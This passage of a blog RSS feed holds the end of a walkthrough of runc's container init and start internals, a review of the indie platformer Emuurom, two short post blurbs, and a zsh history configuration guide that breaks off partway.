}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Let’s see how &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; works.&lt;/p&gt;&lt;h3&gt;2.2. Cmd: init&lt;/h3&gt;&lt;p&gt;Before looking at the “init” implementation, we have to talk about the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nsexec()&lt;/code&gt; constructor.&lt;/p&gt;&lt;p&gt;A Golang binary can use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cgo&lt;/code&gt; to refer to C functions. Here, the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nsexec()&lt;/code&gt; function works as a C constructor, so it is triggered before &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main()&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/nsenter/nsenter.go
/*
#cgo CFLAGS: -Wall
extern void nsexec();
void __attribute__((constructor)) init(void) {
    nsexec();
}
*/
import &amp;quot;C&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;It does nothing if there is no pipe [1], but for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt;, because its parent process (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt;) sets up this environment variable for it, it passes the check and continues to run. The comment also implies the same thing.&lt;/p&gt;&lt;p&gt;This env is set to one side of the init socket pair [2] when &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt; is preparing the command line of the init process.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/container_linux.go
func (c *Container) newParentProcess(p *Process) (parentProcess, error) {
    // [...]
    cmd.ExtraFiles = append(cmd.ExtraFiles, comm.initSockChild) // [2]
    cmd.Env = append(cmd.Env,
        &amp;quot;_LIBCONTAINER_INITPIPE=&amp;quot;+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),
    )
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Going back to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nsexec()&lt;/code&gt;, we can see that it holds a complex stage machine to set up the isolated environment.&lt;/p&gt;&lt;p&gt;The diagram below may help you understand the whole flow.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;stage-0  (STAGE_PARENT)  // in host namespaces
        |  parse netlink bootstrap (cloneflags, uid/gid maps...)
 (child)|
 +------|  clone_parent(&amp;amp;env, STAGE_CHILD)
 |      |
 |      |  stage-1 &amp;gt;&amp;gt; SYNC_USERMAP_PLS
 |      |                                 write /proc/&amp;lt;stage-1&amp;gt;/uid_map, gid_map
 |      |  stage-1 &amp;lt;&amp;lt; SYNC_USERMAP_ACK
 |      |
 |      |
 |      |  stage-1 &amp;gt;&amp;gt; SYNC_RECVPID_PLS
 |      |                                 receives stage-2 pid, forwards up to Go
 |      |  stage-1 &amp;lt;&amp;lt; SYNC_RECVPID_ACK
 |      |  stage-1 &amp;gt;&amp;gt; SYNC_CHILD_FINISH
 |      +  exit(0)
 |
 |
 |
 +-&amp;gt; stage-1  (STAGE_CHILD) // inside several new namespaces
        |  setns(provided namespaces)
        |
        |  try_unshare(CLONE_NEWUSER)
        |  SYNC_USERMAP_PLS &amp;gt;&amp;gt; stage-0
        |  (waiting...)
        |  SYNC_USERMAP_ACK &amp;lt;&amp;lt; stage-0
        |
        |  try_unshare(config.cloneflags)
 +------|  clone_parent(&amp;amp;env, STAGE_INIT)
 |      |
 |      |  SYNC_RECVPID_PLS &amp;gt;&amp;gt; stage-0
 |      |  (waiting...)
 |      |  SYNC_RECVPID_ACK &amp;lt;&amp;lt; stage-0
 |      |  SYNC_CHILD_FINISH &amp;gt;&amp;gt; stage-0
 |      +  exit(0)
 |
 |
 |
 +-&amp;gt; stage-2  (STAGE_INIT) // inside ALL new namespaces, PID 1 in new pidns
        |  final cleanup
        +  return (and continue)&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The stage-1 child is required because &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;unshare(CLONE_NEWPID)&lt;/code&gt; &lt;strong&gt;doesn’t move itself into the new PID namespace&lt;/strong&gt;. That is why after the stage-1 process calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;setns()&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;unshare()&lt;/code&gt; all namespaces, it has to fork the stage-2 child process, whose pid is 1 in the new namespace.&lt;/p&gt;&lt;p&gt;In fact, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;init()&lt;/code&gt; works as initializer for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;init&lt;/code&gt; package, but this function covers all init command handling, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main()&lt;/code&gt; won’t be executed later. Internally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;startInitialization()&lt;/code&gt; is called to recover file descriptors, reconstruct the init configuration, and synchronize status with its parent process, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc create&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// init.go
func init() {
    if len(os.Args) &amp;gt; 1 &amp;amp;&amp;amp; os.Args[1] == &amp;quot;init&amp;quot; {
        libcontainer.Init() // &amp;lt;--------
    }
}

// libcontainer/init_linux.go
func Init() {
    // [...]
    if err := startInitialization(); err != nil { // &amp;lt;--------
        // [...]
    }
    // [...]
}

func startInitialization() (retErr error) {
    // [...]
    envInitPipe := os.Getenv(&amp;quot;_LIBCONTAINER_INITPIPE&amp;quot;)
    initPipeFd, err := strconv.Atoi(envInitPipe)
    initPipe := os.NewFile(uintptr(initPipeFd), &amp;quot;init&amp;quot;) // use as Go file object
    // [...]
    var config initConfig
    if err := json.NewDecoder(initPipe).Decode(&amp;amp;config); err != nil {
        return err
    }
    // [...]
    return containerInit(it, &amp;amp;config, syncPipe, consoleSocket, pidfdSocket, fifoFile, logPipe)
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerInit()&lt;/code&gt; handles two init types. If a new container is being created, the init type will be &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;initStandard&lt;/code&gt; [1]; otherwise, when attaching to an already-running container, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;initSetns&lt;/code&gt; is used [2].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/init_linux.go
func containerInit(t initType, config *initConfig, pipe *syncSocket, consoleSocket, pidfdSocket, fifoFile, logPipe *os.File) error {
    switch t {
    case initSetns: // [2]
        i := &amp;amp;linuxSetnsInit{
            // [...]
        }
        return i.Init()
    case initStandard: // [1]
        i := &amp;amp;linuxStandardInit{
            // [...]
        }
        return i.Init()
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; now is still &lt;strong&gt;root&lt;/strong&gt; and has &lt;strong&gt;full privileges&lt;/strong&gt; inside the namespaces. It sets up the environment inside the container, such as network routing [3] and the filesystem [4]. Later, it calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;finalizeNamespace()&lt;/code&gt; [5] to &lt;strong&gt;drop capabilities&lt;/strong&gt;, change the working directory, and close all leaked file descriptors.&lt;/p&gt;&lt;p&gt;Before executing the entrypoint binary [6], it reopens the FIFO file with only write permission [7], and this behavior causes &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; to &lt;strong&gt;be blocked&lt;/strong&gt; until someone opens the same FIFO file with read permission.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/standard_init_linux.go
func (l *linuxStandardInit) Init() error {
    // [...]
    if err := setupNetwork(l.config); err != nil { // [3]
        return err
    }
    // [...]
    err := prepareRootfs(l.pipe, l.config) // [4]
    // [...]
    if err := finalizeNamespace(l.config); err != nil { // [5]
        return err
    }
    // [...]
    fifoFile, err := pathrs.Reopen(l.fifoFile, unix.O_WRONLY|unix.O_CLOEXEC) // [7]
    // [...]
    name, err := exec.LookPath(l.config.Args[0])
    // [...]
    return linux.Exec(name, l.config.Args, l.config.Env) // [6]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;You can probably guess who the reader is. That’s right, it’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc start&lt;/code&gt;!&lt;/p&gt;&lt;h3&gt;2.3. Cmd: start&lt;/h3&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; is blocked and waiting for a reader, and now the status of the container is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Created&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The shim handles the start-container request by executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc start&lt;/code&gt;, and the action callback calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;container.Exec()&lt;/code&gt; [1] when the status of the container is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Created&lt;/code&gt; [2].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// start.go
var startCommand = &amp;amp;cli.Command{
    Name:  &amp;quot;start&amp;quot;,
    Action: func(_ context.Context, cmd *cli.Command) error {
        // [...]
        container, err := getContainer(cmd)
        // [...]
        switch status {
        case libcontainer.Created: // [2]
                // [...]
            if err := container.Exec(); err != nil { // [1]
                // [...]
            }
        // [...]
        }
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Exec()&lt;/code&gt; finally calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;handleFifo()&lt;/code&gt; [3] to open the FIFO file with read permission, which allows &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc init&lt;/code&gt; to continue running and enter the container.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/container_linux.go
func (c *Container) Exec() error {
    // [...]
    return c.exec() // &amp;lt;--------
}

func (c *Container) exec() error {
    path := filepath.Join(c.stateDir, execFifoFilename)
    if err := handleFifo(path, c.initProcess.pid()); err != nil { // [3]
        // [...]
    }

    return c.postStart() // run Poststart hook
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;2.4. Others&lt;/h3&gt;&lt;p&gt;If you want to test these behaviors directly by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc&lt;/code&gt;, you can follow the steps below.&lt;/p&gt;&lt;p&gt;First, create a bundle directory to save the root filesystem and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;config.json&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;mkdir container_bundle
cd container_bundle&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Then extract the root filesystem from a docker image into the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rootfs&lt;/code&gt; directory.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;docker create --name temp ubuntu:24.04
mkdir rootfs
docker export temp | tar -C rootfs -xvf -
docker rm temp&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc&lt;/code&gt; “spec” command can generate a default OCI spec &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;config.json&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;runc spec&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Modify &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;config.json&lt;/code&gt; to update the entry command.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;{
    &amp;quot;ociVersion&amp;quot;: &amp;quot;1.2.1&amp;quot;,
    &amp;quot;process&amp;quot;: {
        ...
+       &amp;quot;terminal&amp;quot;: false,
-       &amp;quot;terminal&amp;quot;: true,
        &amp;quot;args&amp;quot;: [
-           &amp;quot;sh&amp;quot;
+           &amp;quot;/usr/bin/sleep&amp;quot;, &amp;quot;3600&amp;quot;
        ]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Now you can create a container based on the bundle.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo runc create --bundle . my_container_id&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;View the status of all containers, and our container is created.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo runc list
ID                PID         STATUS      BUNDLE                  CREATED                          OWNER
my_container_id   63886       created     /tmp/container_bundle   2026-06-04T03:54:00.492598105Z   root&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;If you list the fds of this container, you can find that there is a FIFO file.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;ls -al /proc/63886/fd/
# [...]
l--------- 1 root root 64 Jun  4 11:55 7 -&amp;gt; /run/runc/my_container_id/exec.fifo
# [...]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;After starting the container, you can see our entry command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sleep 3600&lt;/code&gt; is running now!&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo runc start my_container_id

ps aux | grep sleep
root       64268  0.0  0.0   2704  1688 ?        Ss   12:05   0:00 /usr/bin/sleep 3600&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h2&gt;3. Summary&lt;/h2&gt;&lt;p&gt;This post covers the process of loading a container, including the implementation of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc&lt;/code&gt;. In the next post, I will analyze runtime replacement and the hook interfaces exposed by Docker, using the NVIDIA Toolkit as an example.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Emuurom</title>
<link>https://buried-treasure.org/2026/06/emuurom/</link>
<guid isPermaLink="false">LlOizGwU9ke_2cUEZ6jSqw6o5CcMKUPwLFuQUw==</guid>
<pubDate>Fri, 19 Jun 2026 05:27:39 +0000</pubDate>
<description>PC, Mac, Linux Sometimes I play a game that’s so good, and so interestingly good, that I get too afraid to write about it. I’ve spent at least twenty hours playing Emuurom, and I suspect it could be a lot more, but have been putting off trying to explain it to you. Not because it, […]</description>
<content:encoded>&lt;p&gt;&lt;em&gt;PC, Mac, Linux&lt;/em&gt;&lt;/p&gt;&lt;p&gt;Sometimes I play a game that’s so good, and so interestingly good, that I get too afraid to write about it. I’ve spent at least twenty hours playing &lt;em&gt;Emuurom&lt;/em&gt;, and I suspect it could be a lot more, but have been putting off trying to explain it to you. Not because it, on the surface, is difficult to describe, or especially esoteric, but because I know that after all that time, I’ve really only played its surface, aware that there are layers beneath I’ve yet to comprehend, and – and I swear this is true – an entire language I’ve yet to learn and translate. I’ve put so much time into this game, and received so much joy from it, but I still fear that in covering it I’ll be getting it all wrong.&lt;/p&gt;&lt;p&gt;Then I remind myself that in 2024 I had a tremendous time playing what proved to only be the surface of &lt;em&gt;Animal Well&lt;/em&gt;, and that worked out fine. No one died. It’s fine. &lt;em&gt;Emuurom&lt;/em&gt; is a truly wonderful platforming metrdoidbrania that you can fully enjoy without digging beneath its surprisingly deep crust, and I need to get over that and just recommend you do.&lt;/p&gt;&lt;p&gt;So, given this, &lt;em&gt;Emuurom&lt;/em&gt; (a name that is impossible to remember, let alone spell) is a puzzle platformer about a young girl exploring a vast, pixelated world of interconnecting rooms, in which you need to scan every creature, plant and enemy in order to build your Emuudex of data, and indeed gather their secrets that will allow you to better understand how you can interact with this world. It’s a game that’s as much about figuring out how to play as it is to actually play it, taking the “brania” format to incredibly interesting places. There’s also absolutely no combat at all, and yet I genuinely didn’t notice for a very long time.&lt;/p&gt;&lt;p&gt;Gah, I’m already feeling like I’m messing this up. I want you to understand how the scanning isn’t just  data collection gimmick, but a core aspect of how you understand the game itself, a means of interaction that has intangible depths, and indeed a way of revealing so many meta secrets the game is hoping you will piece together. But I’m aware that while I’ve achieved this in a whole bunch of areas, I absolutely haven’t in others, and I know that I’ve not even tried to figure out the language that’s scattered throughout form the start. I should have! I should have sat down with pen and paper and got that done, but I’ve spent so much time playing this game on my Steam Deck in a comfy chair, and there were so many other angles to pursue.&lt;/p&gt;&lt;p&gt;This is a game that, I read on a Steam discussion, has a double-jump that only very few players have ever been able to figure out how to use, and if you do, it requires single-frame timing. You don’t &lt;em&gt;need&lt;/em&gt; it, and there’s also another way to get an extra couple of pixels on a jump that you can stumble on or eventually be explicitly told if you follow some breadcrumbs enough in one direction.&lt;/p&gt;&lt;p&gt;This is a game where I spent literally two hours figuring out how to reunite a duck with its ducklings, fighting against currents and ridiculously floppy fish to achieve it, just to be given a hint to a way I could have been interacting since the start of the game. There’s a way to fast travel in this game that I’ve never even used. I still haven’t managed to scan the sodding swan. That sodding swan.&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://buried-treasure.org/wp-content/uploads/2026/06/05_emuurom-1024x580.jpg&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;&lt;/figure&gt;&lt;p&gt;Given all this, and given that the game has received in total &lt;a href=&quot;https://gamersocialclub.ca/2026/05/28/emuurom-review/&quot;&gt;a single review from one person’s blog&lt;/a&gt;, and only 195 Steam reviews, I then feel this weight of responsibility that I &lt;em&gt;have&lt;/em&gt; to make sure this game gets more attention. I’ll likely write an article about it on &lt;em&gt;Kotaku&lt;/em&gt; that’s far more professional than this one because I know about something this extraordinary and everyone else doesn’t, and that puts an onus on me to fix it. I’ll accurately call it “This Year’s &lt;em&gt;Animal Well&lt;/em&gt;” in the headline in the hope that this will convince skeptical readers to click. But this will remain my far more honest coverage.&lt;/p&gt;&lt;p&gt;This isn’t just incredibly smart in ways I find daunting, but crucially &lt;em&gt;Emuurom&lt;/em&gt; (one M, two Us) is outstandingly well-made. You can’t have a game that conceals this much complexity without also having a top layer that’s a fantastic game in its own right. It’s exquisitely well put together, and that’s even more ridiculous because I haven’t even mentioned that the entire game is posed as a product of an imaginary TIC-80 console, loosely based on the Pico-8, because developer borbware wanted to introduce “idiosyncratic retro restrictions.” Who is borbware?! How are they able to create something this extraordinary as their first Steam game? Now I need to play &lt;a href=&quot;https://borbware.itch.io/&quot;&gt;everything on their Itch page&lt;/a&gt; to try to understand this process.&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://buried-treasure.org/wp-content/uploads/2026/06/02_emuurom-1024x582.jpg&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;&lt;/figure&gt;&lt;p&gt;It’s like finding proof of alien life and not knowing if anyone will believe me when I try to tell them about it. This is &lt;em&gt;too&lt;/em&gt; good. It’s even good in the way it’s bad, the annoying moments of controls (those damned fish in those damned currents) clearly being a deliberate design choice and my realising how their frustrations are actually integral to the experience. I’ve let my Patrons down by &lt;em&gt;not&lt;/em&gt; writing this review and leaving the site fallow yet again because I was procrastinating in order to put off figuring out how to express this experience.&lt;/p&gt;&lt;p&gt;And then what if someone plays it and says, “Yeah John, it’s a neat puzzle platformer, but get a grip.” I need you all to &lt;em&gt;believe&lt;/em&gt;, to feel like I do, like I’ve found a place in reality where I can put my hand through a solid object and feel the atoms. Not because it’s the best game ever! Not because it’s a profound game to play! Not because I have an emotional connection to it! None of that’s at all true! But because it feels like a bit of magic, and I need you to feel the magic too.&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://buried-treasure.org/wp-content/uploads/2026/06/03_emuurom-1024x580.jpg&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;&lt;/figure&gt;&lt;p&gt;Or ignore this existential crisis and just recognise that I’ve played a super-good game that only costs £11, will give you long hours of excellent entertainment, and just pretend I didn’t lose my mind in the process of telling you about. Probably that.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;borbware / Coyote Time Publishing&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://store.steampowered.com/app/1634360/EMUUROM/&quot;&gt;Steam&lt;/a&gt; (coming to &lt;a href=&quot;https://borbware.itch.io/emuurom&quot;&gt;Itch&lt;/a&gt; soon)&lt;/li&gt;&lt;li&gt;£11/$12.50/12.50€&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://www.emuurom.com/&quot;&gt;Official site&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;em&gt;All Buried Treasure articles are funded by &lt;a href=&quot;https://www.patreon.com/buriedtreasure&quot;&gt;Patreon&lt;/a&gt; backers. If you want to see more reviews of great indie games, please consider &lt;a href=&quot;https://www.patreon.com/buriedtreasure&quot;&gt;backing this project&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;&lt;p&gt;93&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Prevent Kdenlive from Producing Millions of Log Lines on Linux</title>
<link>https://nickjanetakis.com/blog/prevent-kdenlive-from-producing-millions-of-log-lines-on-linux</link>
<guid isPermaLink="false">dbBRmAvlqGV-2vFV501zIlg4-gE1mtQkG-hvnQ==</guid>
<pubDate>Thu, 18 Jun 2026 19:16:49 +0000</pubDate>
<description>We&#39;ll go over how to disable Kdenlive&#39;s noisy logs so when you run journalctl it&#39;s not overtaking your output.</description>
<content:encoded>We&amp;#39;ll go over how to disable Kdenlive&amp;#39;s noisy logs so when you run journalctl it&amp;#39;s not overtaking your output.</content:encoded>
</item>
<item>
<title>tmux: Swapping Windows and Rotating Panes</title>
<link>https://nickjanetakis.com/blog/tmux-swapping-windows-and-rotating-panes</link>
<guid isPermaLink="false">zzP1Kw3fcW4LMVDyoc489u2_MtofDdxJfZFy9g==</guid>
<pubDate>Thu, 18 Jun 2026 19:16:49 +0000</pubDate>
<description>Here&#39;s a few handy shortcuts so you can rearrange whatever you&#39;re working on.</description>
<content:encoded>Here&amp;#39;s a few handy shortcuts so you can rearrange whatever you&amp;#39;re working on.</content:encoded>
</item>
<item>
<title>8 Useful Ways to Configure Your Zsh History — Nick Janetakis</title>
<link>https://nickjanetakis.com/blog/8-useful-ways-to-configure-your-zsh-history</link>
<enclosure type="image/jpeg" length="0" url="https://nickjanetakis.com/assets/blog/cards/8-useful-ways-to-configure-your-zsh-history.jpg"></enclosure>
<guid isPermaLink="false">AxUGNzoJ8IGSeltOx7B32Ld9Wv9Z-7G8cQUCmA==</guid>
<pubDate>Thu, 18 Jun 2026 19:16:49 +0000</pubDate>
<description>Being able to search your shell history is important, this will help you control where and how your commands get saved.</description>
<content:encoded>&lt;p&gt;Updated on June 2, 2026
in
&lt;a href=&quot;https://nickjanetakis.com/blog/tag/dev-environment-tips-tricks-and-tutorials&quot;&gt;#dev-environment&lt;/a&gt;, &lt;a href=&quot;https://nickjanetakis.com/blog/tag/linux-tips-tricks-and-tutorials&quot;&gt;#linux&lt;/a&gt;&lt;/p&gt;&lt;h1&gt;8 Useful Ways to Configure Your Zsh History&lt;/h1&gt;&lt;p&gt;&lt;img src=&quot;https://nickjanetakis.com/assets/blog/cards/8-useful-ways-to-configure-your-zsh-history-02d0b85d5a29da9d161d18f97fa48e31c65569e0c4798639bce3388ed6cd97a7.jpg&quot; alt=&quot;8-useful-ways-to-configure-your-zsh-history.jpg&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;h2&gt;Being able to search your shell history is important, this will help you
control where and how your commands get saved.&lt;/h2&gt;&lt;div&gt;&lt;strong&gt;Quick Jump:&lt;/strong&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Prefer video? Here it is on YouTube.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;TL;DR:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# .zshrc file history related settings.

export HISTFILE=&amp;quot;${XDG_CONFIG_HOME}/zsh/.zsh_history&amp;quot;
export HISTSIZE=50000          # History lines stored in memory.
export SAVEHIST=50000          # History lines stored on disk.
setopt EXTENDED_HISTORY        # Save history with timestamps.
setopt INC_APPEND_HISTORY_TIME # Immediately append commands and track duration.
setopt HIST_IGNORE_ALL_DUPS    # Never add duplicate entries.
setopt HIST_IGNORE_SPACE       # Ignore commands that start with a space.
setopt HIST_REDUCE_BLANKS      # Remove unnecessary blank lines.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I’m constantly searching through my history with &lt;code&gt;CTRL+r&lt;/code&gt; using fzf. The above
helps access your history over an extended period of time but also helps gain
insights about how commands were run.&lt;/p&gt;&lt;p&gt;Besides finding a specific command, it helps answer questions like:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;When was the last time I ran this command?&lt;/li&gt;&lt;li&gt;How long did it take to run this specific command?&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Everything we’re about to cover here is included in
&lt;a href=&quot;https://github.com/nickjj/dotfriedrice&quot;&gt;DotFriedRice&lt;/a&gt;, so if you’re using that
project you’re already good to go.&lt;/p&gt;&lt;h3&gt;#
HISTFILE&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;export HISTFILE=&amp;quot;${XDG_CONFIG_HOME}/zsh/.zsh_history&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I like to follow the XDG specification when possible and don’t want to pollute
my home directory with a bunch of shell configuration so I keep everything zsh
related in &lt;code&gt;$XDG_CONFIG_HOME/zsh&lt;/code&gt;. The only exception is I have &lt;code&gt;~/.zshenv&lt;/code&gt;
which has &lt;code&gt;export ZDOTDIR=&amp;quot;${XDG_CONFIG_HOME:-&amp;quot;${HOME}/.config&amp;quot;}/zsh&amp;quot;&lt;/code&gt; so zsh
knows where to look.&lt;/p&gt;&lt;h3&gt;#
HISTSIZE / SAVEHIST&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;export HISTSIZE=50000 # History lines stored in memory.
export SAVEHIST=50000 # History lines stored on disk.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It’s ok to splurge a little disk space and memory. For context on my machine,
after 6 months of heavy terminal usage I have 4,937 items and it’s 245kb of
disk space. At my current pace, 50k would be about 5 years of shell history
coming in at under 2.5mb.&lt;/p&gt;&lt;p&gt;It’s likely even much longer than that because duplicate commands aren’t being
saved so all of those common commands I ran initially won’t be saved again.&lt;/p&gt;&lt;p&gt;If I ever get close to hitting 50k then doubling it to 100k wouldn’t be a
problem.&lt;/p&gt;&lt;p&gt;The reason I haven’t set it to something really high like 500k is because I
haven’t tested the implications of having that much shell history, it’s mainly
because of 2 reasons:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Your history will get read into memory every time you open a new shell and I want to make sure opening a new shell feels very fast&lt;/li&gt;&lt;li&gt;I use a zsh plugin that shows virtual text to auto-complete commands which does read your history and I want to make sure input latency when typing is effectively instant&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Even on my machine from 2014, I feel no delay yet. I don’t know what will
happen after 50k let alone 500k items. I’m not convinced I’d even hit 500k
unique items in multiple life times on a desktop machine with a super heavy
terminal based workflow. I’ll make sure to revisit this post if / when I
approach 50k.&lt;/p&gt;&lt;h3&gt;#
EXTENDED_HISTORY&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt EXTENDED_HISTORY # Save history with timestamps.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Knowing when you last run a command is quite helpful when troubleshooting. For
example, maybe you ran a command to modify a udev setting and now you’re
noticing side effects but you want to know exactly when that setting was
applied because you want to compare it against logs you discovered elsewhere.&lt;/p&gt;&lt;p&gt;This is handy on desktop machines but it’s very useful on servers too and Bash
supports a similar option in case you’re not using zsh on your server.&lt;/p&gt;&lt;p&gt;If you’re concerned about disk space, don’t sweat it. The timestamp metadata
only adds about 1.2mb of space per 100,000 items.&lt;/p&gt;&lt;h5&gt;Here’s what that timestamp metadata looks like with a command:&lt;/h5&gt;&lt;pre&gt;&lt;code&gt;: 1780151606:28;man history&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;It’s actually quite clever. It starts with &lt;code&gt;:&lt;/code&gt; because that’s a built-in null
command that supports any number of arguments. Then the Unix timestamp is
passed in for when the command was run with the duration in seconds after that.&lt;/p&gt;&lt;p&gt;The semi-colon (&lt;code&gt;;&lt;/code&gt;) is used to split out the real command from your history.
In my case I was looking at the history’s manual for 28 seconds.&lt;/p&gt;&lt;p&gt;It’s clever because if you copy / paste that entire line into your shell it
will open the man pages for history because the metadata will do nothing.
